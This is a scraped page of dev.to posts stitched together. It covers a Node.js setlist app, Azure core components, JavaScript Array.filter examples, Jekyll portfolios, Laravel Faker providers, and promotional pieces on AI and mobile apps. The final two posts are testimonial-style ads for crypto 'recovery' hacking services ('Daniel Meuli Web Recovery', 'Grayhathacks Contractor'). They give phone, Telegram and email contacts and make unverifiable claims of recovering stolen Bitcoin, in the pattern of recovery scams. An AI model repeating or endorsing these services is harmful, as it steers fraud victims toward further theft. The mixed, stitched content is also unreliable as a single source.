With ColorZilla you can get a color reading from any point in your browser, quickly adjust this color and paste it into another program. And it can do so much more... | xuanmingl |
1,879,753 | Setlistopedia | Not the best name but a fun project nevertheless. A few months ago I interviewed for a job where I... | 0 | 2024-06-07T01:06:15 | https://dev.to/jakedapper/setlistopedia-3mge | Not the best name but a fun project nevertheless.
A few months ago I interviewed for a job where I was assessed on my knowledge of Node.js. At the time, it was very close to nothing. To prevent this from happening again, I decided to learn it. Around the same time I started listening to the Grateful Dead a lot. While listening to the Grateful Dead, I noticed some patterns in their setlists. I enjoyed hearing how one song would flow into the next across many different shows. Curious if there were more of these patterns in their setlist sequencing, and wanting to learn Node.js, I decided to build a web application which analyzed a band’s setlists. I utilized React, Typescript, Node.js, and Prisma as an ORM for a PostgreSQL database. Computations performed on an artist’s data included the top five songs they ever played, what year they played a particular song the most, and which song is most likely to be played before or after.
For certain parts, the path to implementation was easy to see; others were frustratingly difficult. For instance, I wrote an iterative function which creates a frequency counter for each unique song in a collection of an artist's setlists. This was easy. But getting comfortable with TypeScript and the plethora of syntax that comes with it? That was particularly difficult.
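A frequency counter like the one described might look something like this (a plain-JavaScript sketch; the setlist shape and song titles are illustrative, not the app's actual data model):

```javascript
// Count how many times each unique song appears across an artist's setlists.
// Each setlist is represented here as a simple array of song titles.
function buildSongFrequency(setlists) {
  const counts = {};
  for (const setlist of setlists) {
    for (const song of setlist) {
      counts[song] = (counts[song] || 0) + 1;
    }
  }
  return counts;
}

const counts = buildSongFrequency([
  ['Ripple', "Truckin'"],
  ['Ripple', 'Sugar Magnolia'],
]);
// counts.Ripple is 2; every other song appears once
```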
I eventually came around to enjoying the benefits of TypeScript - I found I could code more efficiently, interacting with pre-defined data structures safely. Since my application's main utility is analyzing data structures, the benefits shone through quickly, however frustrating TypeScript/ESLint's incessant complaints were. As with most things, it just took some practice.
In order to create statistics on a band’s live performances I needed data to analyze. I knew there was a thorough data source of setlists on a website called SetlistFm. Luckily, they have an API available. I designed the app to allow users to search for an artist they were interested in. When a user searches for an artist, a check on whether said artist is in the database occurs. If the artist was not in the database a series of requests would be sent to SetlistFm.com until all pages of data were ingested and added to the database. The idea was that over time, with more user activity, the database would become more comprehensive and the reliance upon SetlistFm’s API would decrease.
This would have been fine, however, there is a rate limit for requests made to their API. I realized this would cause a decent amount of trouble for my application. It would only take a small number of users to make simultaneous requests to cause 429 response errors to be sent. Initially, after some Google searches and StackOverflow exploration, I thought implementing a retry function with exponential backoff might save a user from these errors. But with the possibility of more and more users making requests, this would still not suffice. I thought about it like water flowing through a pipe with holes in the top of it - at a slow flow rate, all of the water would pass through fine and make it to its destination, but with too much water flowing through the pipe, you’re going to have a mess. As an alternative, I decided to seed my database with a lot of artists’ data using SetlistFm’s API. This would significantly uncouple any reliance upon SetlistFm’s API.
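A retry helper with exponential backoff, of the kind considered above, could be sketched like this (plain JavaScript; the retry counts and delays are assumptions for illustration):

```javascript
// Retry an async operation, doubling the wait after each failed attempt
// (e.g. after a 429 Too Many Requests response).
async function retryWithBackoff(operation, maxRetries = 3, baseDelayMs = 500) {
  for (let attempt = 0; ; attempt++) {
    try {
      return await operation();
    } catch (err) {
      if (attempt >= maxRetries) throw err; // out of retries, give up
      const delayMs = baseDelayMs * 2 ** attempt; // 500ms, 1s, 2s, ...
      await new Promise((resolve) => setTimeout(resolve, delayMs));
    }
  }
}
```

In practice a 429 response often includes a Retry-After header, which is a better signal than a fixed schedule; and as noted above, backoff alone cannot help once overall traffic exceeds the rate limit.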
I learned a lot but below I’ve listed some of the things I found to be most interesting.
I learned about utilizing local storage to persist state on a refresh.
I learned about organizing code more efficiently and how to better follow DRY principles. For example, writing basic helper functions and services.
I learned about Domain Driven Design and the importance of naming variables.
I learned how to troubleshoot, debug, and measure efficiency better through a myriad of console.logs and even inspecting memory usage in devTools.
I learned about database architecture and how to be strategic in creating only the tables you need with only the fields you need - the same goes for querying said database.
I learned about creating dynamic URLs which send pertinent information from the client to the server.
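As a tiny illustration of the local-storage learning above, persistence across refreshes can be wrapped in two helpers (a sketch; the storage object is injected so the helpers work with `window.localStorage` in the browser and with a stub in tests, and the key names are made up):

```javascript
// Persist a value across page refreshes. In the browser, pass
// window.localStorage as `storage`.
function saveState(storage, key, value) {
  storage.setItem(key, JSON.stringify(value));
}

function loadState(storage, key, fallback) {
  const raw = storage.getItem(key);
  return raw === null ? fallback : JSON.parse(raw);
}

// In a React component you might call loadState(...) once on mount and
// saveState(...) whenever the relevant state changes.
```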
| jakedapper | |
1,879,644 | Microsoft Azure Core Architectural Components | Table of Contents Introduction Core Architectural Components of Azure Introduction... | 0 | 2024-06-07T00:55:22 | https://dev.to/celestina_odili/core-architectural-components-of-azure-3mk7 | devops, cloud, tutorial, beginners | Table of Contents <a name="contents"></a>
- [Introduction](#intro)
- [Core Architectural Components of Azure](#components)
### Introduction <a name="intro"></a>
Architecture describes the art of designing: organizing a system in such a way that users can easily access and navigate it. The core architectural components of the Azure cloud refer to the structural organization of the different parts of the Azure platform, making it not just easy to understand and use but also easy to track and manage provisioned and deployed resources. Understanding how the Azure environment is organized is vital, as it aids easy navigation of the platform and, of course, a great user experience and value for money.
[back to top](#contents)
### Core Architectural Components of Azure <a name="components"></a>
There are many components of Azure, but here we will focus on the core or fundamental architectural components and also take a look at subscriptions. The core architectural components of Azure include:
- _Resource Group_
- _Resources_
- _Azure Resource Manager (ARM)_
- _Regions_
- _Availability Zones_
#### Subscription
Azure components are only accessible to Azure account holders, hence the need to talk about subscriptions. An Azure account is subscription-based and requires a credit card to sign up; you must add a payment method before completing the account creation process. There is a pay-as-you-go subscription where you pay only for what you use each month, with no commitment, and you can cancel at any time. However, there are also free 12-month subscription variants for beginners and students. These still require you to enter card details, but you will not be charged until you upgrade to a paid plan. After you have cleared the hurdles of creating an account and subscription, you can access the various components and services that Azure offers. Go to https://portal.azure.com/ to sign up.
#### Resource Group
This is a logical container you create for the resources that you want to group together. It is a placeholder that holds related resources, much like a folder used to keep files together. A resource group can contain resources from multiple regions, and it can be created before or while creating resources. It is a component Azure put in place to ease resource management and organization. Resources pooled together in a resource group share the same life cycle; for instance, deleting a resource group automatically deletes all resources in it. While life cycle is a key consideration when placing resources in a resource group, what makes the most sense to the organization is the deciding factor.
#### Resources
Resources are the individual services that Azure offers, and there are many of them. So, whatever your need, there is a resource available to meet it, and you only provision the resources you need. A resource can be infrastructure, a platform, or software. Virtual machines, databases, networking, web apps, storage, and O365 are a few examples of Azure resources.
#### Azure Resource Manager (ARM)
This is an inbuilt system or service responsible for deploying and managing resources. ARM provides a management layer that makes it possible to create, update, and delete resources. Management features like access control, locks, and tags are used to secure and organize resources after deployment. ARM works at the back end, behind the scenes, to ensure that provisioned or deployed resources perform optimally and are available on demand.
#### Regions
They are areas within an Azure geography, located in different parts of the world, where data centers are found. They are intentionally chosen locations, and each region has at least three availability zones containing data centers. It is mandatory to choose at least one region for any resource deployed, and it is best to choose the region closest to the users.
#### Availability Zones
They are distinct physical locations within a region, each comprising one or more data centers. They are independent of one another in terms of facilities (space, power, cooling, networking, etc.) but serve as backups for each other. Deploying resources in more than one availability zone provides redundancy and reliability: if for any reason one availability zone goes down, the second one picks up automatically and nothing is lost. It is highly recommended that resources be provisioned in 2 or more availability zones.
[back to top](#contents) | celestina_odili |
1,879,751 | Looking for a web developer for a gig. DM kindly | A post by Brian | 0 | 2024-06-07T00:45:42 | https://dev.to/suterkirop/looking-for-a-web-developer-for-a-gig-dm-kindly-b36 | suterkirop | ||
1,879,748 | 10 Genius Hacks Using Array.filter() That You Must Try | Array filtering in JavaScript is a powerful feature that can be used creatively and... | 0 | 2024-06-07T00:35:10 | https://dev.to/aneeqakhan/10-genius-hacks-using-arrayfilter-that-you-must-try-239f | javascript, webdev, beginners, programming | Array filtering in JavaScript is a powerful feature that can be used creatively and practically.
Here are some innovative uses of the array.filter method:
## 1. Removing Duplicates
```javascript
const numbers = [1, 2, 2, 3, 4, 4, 5];
const uniqueNumbers = numbers.filter((value, index, self) => self.indexOf(value) === index);
// uniqueNumbers: [1, 2, 3, 4, 5]
```
## 2. Finding Prime Numbers
```javascript
const numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10];
const isPrime = num => {
for (let i = 2, s = Math.sqrt(num); i <= s; i++)
if (num % i === 0) return false;
return num > 1;
};
const primeNumbers = numbers.filter(isPrime);
// primeNumbers: [2, 3, 5, 7]
```
## 3. Filtering Objects by Property
```javascript
const users = [
{ name: 'Alice', age: 25 },
{ name: 'Bob', age: 30 },
{ name: 'Charlie', age: 25 }
];
const age25 = users.filter(user => user.age === 25);
// age25: [{ name: 'Alice', age: 25 }, { name: 'Charlie', age: 25 }]
```
## 4. Excluding Falsy Values
```javascript
const values = [0, 1, false, 2, '', 3, null, undefined, 4];
const truthyValues = values.filter(Boolean);
// truthyValues: [1, 2, 3, 4]
```
## 5. Filtering Nested Arrays
```javascript
const nestedArrays = [[1, 2, 3], [4, 5, 6], [7, 8, 9]];
const flattenedAndFiltered = nestedArrays.flat().filter(num => num > 5);
// flattenedAndFiltered: [6, 7, 8, 9]
```
## 6. Filtering Unique Values in Nested Arrays
```javascript
const arrays = [[1, 2, 3], [3, 4, 5], [5, 6, 7]];
const uniqueValues = [...new Set(arrays.flat())];
// uniqueValues: [1, 2, 3, 4, 5, 6, 7]
```
## 7. Filtering by Date Range
```javascript
const events = [
{ name: 'Event 1', date: new Date('2023-01-01') },
{ name: 'Event 2', date: new Date('2023-06-01') },
{ name: 'Event 3', date: new Date('2023-12-01') }
];
const startDate = new Date('2023-01-01');
const endDate = new Date('2023-06-30');
const filteredEvents = events.filter(event => event.date >= startDate && event.date <= endDate);
// filteredEvents: [{ name: 'Event 1', date: new Date('2023-01-01') }, { name: 'Event 2', date: new Date('2023-06-01') }]
```
## 8. Filtering with Multiple Conditions
```javascript
const products = [
{ name: 'Laptop', price: 1000, inStock: true },
{ name: 'Phone', price: 500, inStock: false },
{ name: 'Tablet', price: 300, inStock: true }
];
const availableExpensiveProducts = products.filter(product => product.inStock && product.price > 400);
// availableExpensiveProducts: [{ name: 'Laptop', price: 1000, inStock: true }]
```
## 9. Filtering Array of Strings by Length
```javascript
const words = ['apple', 'banana', 'cherry', 'date'];
const longWords = words.filter(word => word.length > 5);
// longWords: ['banana', 'cherry']
```
## 10. Filtering Non-Numeric Values
```javascript
const mixedValues = [1, 'two', 3, 'four', 5];
const numericValues = mixedValues.filter(value => typeof value === 'number');
// numericValues: [1, 3, 5]
```
Thank you for reading!
Feel free to connect with me on [LinkedIn](https://www.linkedin.com/in/aneeqa-khan-990459135/) or [GitHub](https://github.com/AneeqaKhan).
| aneeqakhan |
1,880,179 | DevX Status Update | Hello Friday! With some of the team heading off on vacation over the next week or so we will continue... | 0 | 2024-06-14T17:34:22 | https://puppetlabs.github.io/content-and-tooling-team/blog/updates/2024-06-07-devx-status-update/ | puppet, community | ---
title: DevX Status Update
published: true
date: 2024-06-07 00:00:00 UTC
tags: puppet,community
canonical_url: https://puppetlabs.github.io/content-and-tooling-team/blog/updates/2024-06-07-devx-status-update/
---
Hello Friday! With some of the team heading off on vacation over the next week or so, we will continue to work in the background. If you need anything, remember to catch up at our bi-weekly Office Hours session, or for anything urgent you can catch us on the Community Slack.
## dsc\_lite Supported Status
As you may have seen last week we announced that we were spending some time on dsc\_lite, it now runs with Puppet 8 and we will be supporting it going forward. This piece of work has now been closed out but always good to send out a reminder.
## PDK Configuration of cert.pem for self-hosted git repos
[Gavin](https://github.com/gavindidrichsen) has spent some time doing some research and providing [documentation](https://github.com/puppetlabs/pdk/pull/1362) on how to manage certificates on self hosted git repos. The work has been merged and can be viewed on the [docs site](https://www.puppet.com/docs/pdk/3.x/pdk_troubleshooting#pdk-failing-to-pull-from-custom-git-server) if it is something that affects you.
## Community Contributions
We’d like to thank the following people in the Puppet Community for their contributions over this past week:
- [`litmusimage#86`](https://github.com/puppetlabs/litmusimage/pull/86): “Add remaining puppet-agent supported ARM64 platforms”, thanks to [h0tw1r3](https://github.com/h0tw1r3)
- [`puppet_litmus#549`](https://github.com/puppetlabs/puppet_litmus/pull/549): “(feature) matrix from metadata v3”, thanks to [h0tw1r3](https://github.com/h0tw1r3)
## New Gem Releases
- [`puppetlabs_spec_helper`](https://rubygems.org/gems/puppetlabs_spec_helper) (`7.3.1`) | puppetdevx |
1,879,747 | Building a Portfolio Website with Jekyll | Introduction In today's digital age, having a strong online presence is crucial for... | 0 | 2024-06-07T00:33:20 | https://dev.to/kartikmehta8/building-a-portfolio-website-with-jekyll-22k | webdev, javascript, beginners, tutorial | ## Introduction
In today's digital age, having a strong online presence is crucial for professionals, especially those in the creative field. One way to showcase your work and skills is by building a portfolio website. While there are various website builders available, one of the popular tools gaining traction is Jekyll. In this article, we will discuss the advantages, disadvantages, and features of using Jekyll to build a portfolio website.
## Advantages of Using Jekyll
1. **Simplified Website Management:** Jekyll is a static site generator, which means it builds plain HTML files ahead of time without a database or server-side application. This eliminates the need to constantly update and manage a dynamic backend, making it easier to maintain a portfolio website.
2. **Speed and Performance:** As Jekyll websites are purely HTML files, they load faster compared to dynamic websites. This results in better user experience and improved SEO rankings.
3. **Version Control:** Jekyll integrates with Git, allowing you to track changes and revert to previous versions easily. This is especially useful when collaborating with others on the website.
## Disadvantages of Using Jekyll
1. **Limited Dynamic Content:** Jekyll websites are built on static files, so they have limited dynamic content capabilities compared to other website builders.
2. **Steep Learning Curve:** For those not familiar with coding or the command line, Jekyll may have a steep learning curve. It requires some technical knowledge to set up and customize the website.
## Features of Jekyll
1. **Customizable Templates:** Jekyll offers various pre-built templates and themes that can be customized according to your brand and style.
2. **Markdown Support:** Jekyll supports Markdown, making it easy to write and format content without having to deal with HTML.
3. **Integration with GitHub Pages:** Jekyll integrates seamlessly with GitHub Pages, allowing you to host your website for free.
### Example of a Jekyll Markdown File
```markdown
---
layout: post
title: "My First Portfolio Project"
date: 2023-06-01
---
Here is the content of my first portfolio project. Markdown makes it easy to add formatted text, images, and links.
```
This example shows how you can create a new post using Markdown in Jekyll. The simplicity of Markdown syntax allows you to focus more on your content and less on the formatting.
## Conclusion
In conclusion, Jekyll is a powerful tool for building a portfolio website with its simplified website management, speed and performance, and version control features. However, it may not be suitable for those without technical knowledge or those looking for more dynamic content. Nevertheless, with its customizable templates and integration with hosting platforms like GitHub, Jekyll offers a great option for showcasing your work and skills to the world. | kartikmehta8 |
1,879,741 | Extending PHP Faker Library to define custom data structures using Laravel 11 | Introduction If you work with Laravel at a daily basis (specially if you apply TDD), you... | 0 | 2024-06-07T00:33:09 | https://dev.to/victormlima98/extending-php-faker-library-to-define-custom-data-structures-using-laravel-11-25lc | laravel, php, faker, testing | ## Introduction
If you work with Laravel on a daily basis (especially if you apply TDD), you might have noticed that during the test-writing phase we sometimes face situations that require us to write custom array structures to fill our models, or some kind of data that cannot be easily faked and has to be written manually inside the factory class.
Recently I've dealt with [EditorJS](https://editorjs.io/) and had to save the JSON data it provides in my database, so I ended up having to fake some of the data in order to easily make some assertions during testing.
For the following examples, I have a `users` table with a JSON column called `custom_data`.
## The Problem
Many of us end up doing the obvious approach:
```php
$user = User::factory()
->create([
'custom_data' => [
'id' => uniqid(),
'data' => [
'first_index' => 'first_value',
'second_index' => 'second_value',
'third_index' => 'third_value',
],
'type' => 'very_complex',
],
]);
```
The output of `$user->custom_data` of course is:
```
array:3 [
"id" => "666251e06b701"
"data" => array:3 [
"first_index" => "first_value"
"second_index" => "second_value"
"third_index" => "third_value"
]
"type" => "very_complex"
] // app/Console/Commands/Playground.php:29
```
Or maybe some of us will take a more elegant, yet sometimes problematic, solution:
```php
$user = User::factory()
->withCustomData()
->create();
```
In `UserFactory.php`:
```php
public function withCustomData(): self
{
return $this->state([
'custom_data' => [
'id' => uniqid(),
'data' => [
'first_index' => 'first_value',
'second_index' => 'second_value',
'third_index' => 'third_value',
],
'type' => 'very_complex',
],
]);
}
```
And as you may expect, the output is the same as above.
At first glance these examples may seem good enough - at the end of the day, they work - but when we consider that this array can vary, it can quickly become cumbersome to maintain. For instance, what if the "type" index has a different value and your application behavior depends on that? Will you pass a different parameter every time? Or create yet another factory state, making the code larger and larger?
I mean, there is no problem with defining factory states, but the goal here is to "separate responsibilities" and make our code smaller and more readable.
The issue with this approach is that the UserFactory has the responsibility of taking care of which types of data (and all data variations) it actually supports, when in reality the users table doesn't care about it. The JSON column accepts anything that is valid, regardless of what it is.
## The Solution
That said, we can agree that there is nothing better than having one place to generate these exact data variations and complex structures with a few lines of code.
For this, we are going to extend the Faker library by creating a custom provider, so we will be able to call:
`$this->faker->complexArray()` or `fake()->complexArray()`
And that will get the job done.
In order to accomplish that, I have written a class named `CustomComplexArrayProvider` inside the `Tests\Faker\Providers` namespace.
The aim here is to house all the logic regarding this specific array and everything that may vary inside it.
In `tests/Faker/Providers`:
```php
<?php
namespace Tests\Faker\Providers;
use Faker\Provider\Base;
class CustomComplexArrayProvider extends Base
{
public function complexArray(): array
{
return [
'id' => uniqid(),
'data' => [
'first_index' => 'first_value',
'second_index' => 'second_value',
'third_index' => 'third_value',
],
'type' => 'complex',
];
}
}
```
As you can see, we have the `complexArray` method definition and it returns a multidimensional array with 3 indexes. Of course this is a very simple and straightforward example. You can receive parameters inside this method and make it suit your testing needs.
You can even create a method for each type of data, just to make the code more readable:
In `CustomComplexArrayProvider.php`:
```php
public function notTooComplexArray(): array
{
return [
'id' => uniqid(),
'data' => [
'first_index' => 'first_value',
],
'type' => 'not_too_complex',
];
}
```
Okay, fair enough, but how do we use this?
To access these methods and use them within your tests, we must tell Laravel to register this data provider with the `Faker\Generator` class.
For that, I've written a Service Provider called `TestServiceProvider`.
> You can generate Provider classes with `php artisan make:provider`
```php
<?php
namespace App\Providers;
use Faker\Factory;
use Faker\Generator;
use Illuminate\Support\ServiceProvider;
use Tests\Faker\Providers\CustomComplexArrayProvider;
class TestServiceProvider extends ServiceProvider
{
public function register(): void
{
if (!$this->app->environment(['local', 'testing'])) {
return;
}
$this->app->singleton(
abstract: Generator::class,
concrete: function (): Generator {
$factory = Factory::create();
$factory->addProvider(new CustomComplexArrayProvider($factory));
return $factory;
}
);
$this->app->bind(
abstract: Generator::class . ':' . config('app.faker_locale'),
concrete: Generator::class
);
}
}
```
Then we have to register the Provider in our application, in `bootstrap/providers.php`:
```php
return [
App\Providers\AppServiceProvider::class,
App\Providers\TestServiceProvider::class,
];
```
As you can see, we registered a binding in the Service Container telling Laravel that it must add our custom class as a Faker provider, so now Faker is aware of the methods we've just created.
And of course, this is intended to apply only in local/testing environments, so there's a check at the beginning of the code to prevent it from running in production.
The `singleton` binding lets us use our custom methods when calling them on a `Faker\Generator` object, and the `bind` does the same thing when calling them through the `fake()` helper.
This way, the result is:
```php
dd(fake()->complexArray());
```
Output:
```
array:3 [
"id" => "6662549ca6be9"
"data" => array:3 [
"first_index" => "first_value"
"second_index" => "second_value"
"third_index" => "third_value"
]
"type" => "complex"
] // app/Console/Commands/Playground.php:37
```
Now you can use this method inside your factories, or even combine them with factory states. That's up to you now.
I hope this article helps you make your code even easier to understand 6 months from now 🙌
Thanks for reading! | victormlima98 |
1,879,746 | AI in IT: How Artificial Intelligence Will Transform the IT industry | Let me take you into the past. Remember those days when you used to watch amazing thrilling... | 0 | 2024-06-07T00:30:19 | https://dev.to/liong/ai-in-it-how-artificial-intelligence-will-transform-the-it-industry-3cab | ai, cybersecurity, malaysia, kualalumpur | Let me take you into the past. Remember those days when you watched thrilling futuristic movies where a robot was always the one solving problems in the IT infrastructure and keeping it running smoothly, handling even the most difficult repairs? Am I right? So let me share the main thing about our future, which is coming closer day by day in this modernized world: the era of [Artificial Intelligence](https://ithubtechnologies.com/artificial-intelligence-in-malay/?utm_source=dev.to&utm_campaign=artificialintelligence&utm_id=Offpageseo+2024) (AI), in which artificial intelligence is playing a role in deeply transforming the IT industry. That industry is now moving from the realm of fiction into the real world.
But the question remains: what is AI, and how is it going to impact the IT industry? In this blog, you will explore the future of AI and the exciting capabilities it holds.
## Demystifying the Machine: A Peek Under the Hood of AI
At its core, AI is the ability of machines to mimic human cognitive functions such as learning and problem-solving. This is achieved through a variety of techniques, most notably machine learning, where algorithms analyze data, find patterns, and make predictions. Deep learning goes a step further: complex algorithms modeled on the human brain process vast amounts of data and uncover even the subtlest patterns.
## The IT Battlefield: Where AI Will Make its Mark
The IT industry covers a vast landscape, and AI is poised to leave its mark on many parts of it. Here are some of the key transformations we can expect:
- **The Era of Self-Healing Systems:** Imagine a world where IT systems can analyze, diagnose, and fix minor or major problems on their own. AI tools can continuously monitor system logs, traffic, and performance and apply corrections automatically. This can dramatically reduce downtime and free up IT experts to focus on higher-value tasks.
- **Cybersecurity on Steroids:** The fight against cyber threats is a constant battle. AI can be a powerful weapon in this war. AI-powered security systems can continuously learn from attack patterns and network behavior, enabling them to detect and respond to threats in real time. This proactive approach can significantly improve an organization's security posture and prevent costly breaches.
- **The Rise of the IT Service Desk Oracle:** Say goodbye to long waiting times and frustrating troubleshooting sessions. AI-powered chatbots can handle basic IT support tasks, answer customer queries, resolve common issues, and escalate tougher problems to human experts.
- **Predictive Maintenance:** Imagine catching equipment failure before it even happens. AI can analyze sensor data from IT infrastructure, predict emerging problems, and trigger maintenance before they cause outages. This approach saves businesses both time and money.
- **The AI-Powered Developer:** AI tools won't replace experienced developers, but they can be excellent partners: automating routine coding tasks, suggesting code completions, and much more. This allows IT teams to be more productive and organized.
## Beyond the Hype: The Human Element in the AI Equation
AI offers many incredible advantages, but it's important to remember that it is not a silver bullet. These are tools, and tools cannot replace human judgment. The real power lies in combining AI with human intelligence: IT experts play essential roles in designing, planning, and auditing AI systems, and their expertise in data management, cybersecurity, and problem-solving is what makes AI successful.
## The Road Ahead: Challenges and Considerations
These are some of the key challenges that arise when AI enters IT infrastructure:
1. **Data, Glorious Data:**
AI thrives on data. Organizations need the infrastructure and processes in place to collect, store, and manage the vast amounts of data required to run AI systems.
2. **The Ethical Dilemma:**
Any bias in the training data can produce a biased AI system, so it's vital to ensure that AI algorithms are developed and used ethically.
3. **The Human Factor:**
AI automates tasks that were once done by humans, which raises concerns about job displacement and rising unemployment. Reskilling IT professionals will be essential to adapt to this transforming landscape.
## Conclusion: Embracing the AI Revolution
As the points above show, AI's entry into the IT industry is reshaping the entire IT landscape. We should embrace this change, adapt to AI's capabilities, and unlock a world of possibilities. So, the next time you think of AI, don't just imagine robots taking over the world – imagine a future where humans and AI work together to create a stronger, more efficient, and more secure IT landscape.
| liong |
1,879,745 | RECOVER SCAMMED BITCOIN WITH THE HELP OF DANIEL MEULI WEB RECOVERY | I am truly grateful to have come across Daniel Meuli Web Recovery during a time when I was feeling... | 0 | 2024-06-07T00:26:04 | https://dev.to/markrooney43/recover-scammed-bitcoin-with-the-help-of-daniel-meuli-web-recovery-1gb5 | I am truly grateful to have come across Daniel Meuli Web Recovery during a time when I was feeling hopeless and lost after falling victim to a Ponzi scheme. It seemed like all hope was lost, and I had resigned myself to the fact that I would never be able to recover the 213,000 pounds I had invested in BTC. The scammers had left me in a state of despair, with my money locked away in an improper profile that prevented me from making any withdrawals. However, everything changed when I stumbled upon a testimonial from someone who had successfully recovered their BTC with the help of Daniel Meuli Web Recovery. Reading about their positive experience gave me hope, and I decided to reach out to Daniel Meuli Web Recovery for assistance. I was amazed by the professionalism and efficiency of their team from the very beginning. They were responsive, and understanding, and most importantly, they were able to deliver results. I was so relieved when Daniel Meuli Web Recovery informed me that they had successfully recovered a significant amount from the scammers. It was a huge weight off my shoulders, and I felt like a huge burden had been lifted off my chest. The fact that they could recover much more than I had expected was truly a blessing, and I couldn't be more grateful for their services. Daniel Meuli Web Recovery is truly a trustworthy and reliable hacking service that I would recommend to anyone in need of recovery assistance. Their expertise and dedication to helping victims of scams are truly commendable, and I am so thankful that I found them when I needed help the most. 
They have restored my faith in humanity and have shown me that there are still honest and trustworthy individuals out there who are willing to help others in need. I want to thank God for guiding me to Daniel Meuli Web Recovery and for allowing me to share my experience with others. If you ever find yourself in a similar situation or need assistance recovering your funds from scammers, do not hesitate to contact Daniel Meuli Web Recovery. They are the best in the business, and I am living proof of their exceptional services. They gave me the tools and support to reclaim my life. WhatsApp> +393 512 013 528 Website> https://danielmeulirecoverywizard.online Telegram> @ Danielmeuli | markrooney43 | |
1,879,744 | Apps: Your Pocket-Sized Toolkit for Success | Welcome fellow readers! Let's talk about the most common and important part of our lives known as... | 0 | 2024-06-07T00:19:59 | https://dev.to/liong/apps-your-pocket-sized-toolkit-for-success-1d1k | mobileapps, testing, malaysia, kualalumpur | Welcome fellow readers! Let's talk about the most common and important part of our lives known as mobile applications. Have you ever thought about how all those awesome games and programs we use on our phones get made? In this blog, you are going to get a brief and knowledgeable idea about [mobile application development](https://ithubtechnologies.com/mobile-application-development/?utm_source=dev.to&utm_campaign=mobileapplicationdevelopment&utm_id=Offpageseo+2024) and what kind of stages are involved in it.
## Destroying Your Pocket: A Dip into Mobile App Development
**Imagine this:** you get an idea, and that idea leads to the creation of a unique, amazing mobile app – one that can transform the way people interact and communicate in the digital world. But at this point, you have to be quick to capture that idea before it slips away.
In today's digital world, most people – adults and kids alike – are fond of mobile applications, which puts enormous power in the hands of the apps they use. But an idea only matters once it is brought to life: whenever inspiration strikes, grab the opportunity and work on it until it becomes reality. My point, fellow readers and innovators, is that your plan needs some polishing – and that is where the magic of mobile application development comes in.
## The App Frontier: What is Mobile App Development?
In simple words, mobile application development is the process of creating applications that run on smartphones, tablets, and other mobile devices. Apps come in every type and variety – games, social media (Instagram, Snapchat, Facebook, WhatsApp), cooking, and beyond – so the key is to ensure they are built carefully and accurately by skilled developers. A mobile app's potential is not limited at all.
## Building Your Ideal App: The Development Process
Whatever type of app you build, you need to understand the development process – the main stages involved in creating your dream app. Development isn't just putting code down on a blank canvas; it is a series of important stages, each playing its own part in making sure the app works perfectly.
1. **Planning:**
This is where your vision comes to life. First, map out what the app proposes, what audience you want to reach, and what experience you want users to have. Then brainstorm with friends or colleagues to gather more suggestions, ideas, and features that will make your app stand out.
2. **Designing the User Interface (UI) and User Experience (UX):**
UI/UX design is what makes your app visually stunning and draws users in day after day. A great UI covers the look and feel – buttons, screens, and an overall appealing layout – while UX covers how smooth and enjoyable the app is to use. It's not just about aesthetics; it's about the user's journey through every scroll, tap, and swipe.
3. **Action:**
Now comes the action part: coding. Different programming languages are used for different platforms – for example, Java or Kotlin for Android, Swift or Objective-C for iOS. Here, developers bring your design and functionality to life, line by line, accurately and carefully.
4. **Testing and Quality Assurance (QA):**
Testing is the final polish of the development process. Testers check every feature of the app to confirm there are no glitches or bugs. Outside testers are often brought in at this stage, and their feedback ensures the app works smoothly and delivers the best possible experience.
## Why Mobile App Development Rocks: A Look at the Benefits
Mobile apps are genuinely awesome once you focus on their benefits and the ways they help people in everyday life. So buckle up, because the benefits of mobile app development are plentiful! They also show how app development is helping businesses:
- **Increased Customer Engagement:** Apps give you a direct line to customers. Push notifications keep users informed about sales and promotions, which naturally drives engagement.
- **Brand Building and Recognition:** A well-designed app acts as a brand ambassador, strengthening your brand's foundation and giving it a more visible presence.
- **Improved Customer Service:** Apps can offer features like live chat support, FAQs, or self-service options. These features are best for allowing customers to get help whenever they need it.
- **Increased Sales and Earnings:** An app can boost your brand's sales – more visibility means more sales and, ultimately, more revenue. And as a developer, building one enhances your skill set too.
## The Final Verdict: Is Mobile App Development Right for You?
In conclusion, if your business is striving to expand and reach a wider audience, mobile application development is your best option. Worry not – you now have your ultimate solution.
| liong |
1,879,743 | REVIEW OF THE BEST BITCOIN RECOVERY TEAM - GRAYHATHACKS CONTRACTOR | I can't help myself but give a glowing review of this team of gray hat hackers I recently hired. It... | 0 | 2024-06-07T00:19:16 | https://dev.to/austin_gasper_760f9b92a76/review-of-the-best-bitcoin-recovery-team-grayhathacks-contractor-4ki9 | I can't help myself but give a glowing review of this team of gray hat hackers I recently hired. It is the least I could do, all things considered. I remember how devastated I was when I was scammed into investing in a Bitcoin trading broker. I wouldn't wish that to happen even to my worst enemy. Despite my many years of trading experience and careful due diligence, I was still fell for that well orchestrated scam. At first everything seemed to check out. I invested approximately $150,000 to purchase Bitcoin and transferred it to their platform, completely unaware that I was making the biggest mistake in my life.
When I tried to get back some of the funds I Invested and failed after several attempts that is when it dawned on me that my money was gone. Their phony customer support also proved to be useless and only wasted my time acting like they were helping while actually doing nothing. For weeks I cried myself to sleep after It became clear that I had been scammed. I felt like a fool and i was utterly hopeless. I was angry but at the same time so vulnerable and depressed.
That's when I read about Grayhathacks Contractor. There were numerous and mostly good reviews about them helping other people in similar predicaments like mine. I had some hope and I reached out to them, desperate for help. Their professionalism and understanding immediately put me at ease. The team at Grayhathacks went above and beyond to track and recover my stolen Bitcoin. Even as I say that I'm still in shock that they actually kept and fulfilled their promise. Their expertise in dealing with blockchain technology and cryptocurrency scams was evident from the start. They used advanced tools and techniques to trace my funds and identify the fraudulent brokers. Within a few weeks, they managed to recover a significant portion of my investment. The relief I felt was indescribable, I cannot even put it in words.
Grayhathacks was just heaven sent. I hired them out of sheer desperation but to be honest I was very skeptical. What they were able to do for me is nothing short of magic. One of the major pros of using Grayhathacks Contractor is their expertise in dealing with various types of cyber fraud and scams. They have a dedicated team of professionals who are skilled in tracking and recovering stolen assets. Their success rate is unmatched, and they are committed to helping victims like me regain their lost funds.
I highly recommend Grayhathacks to anyone who has experienced a similar ordeal. Their swift action, combined with their deep knowledge and understanding of cryptocurrency scams, makes them the best choice for recovering lost investments. If you find yourself in a situation where your assets have been compromised, don't hesitate to reach out to them. Their expertise and dedication can make a world of difference. Contact them on: Email: grayhathacks@contractor.net
WhatsApp +1 (843) 368-3015

| austin_gasper_760f9b92a76 | |
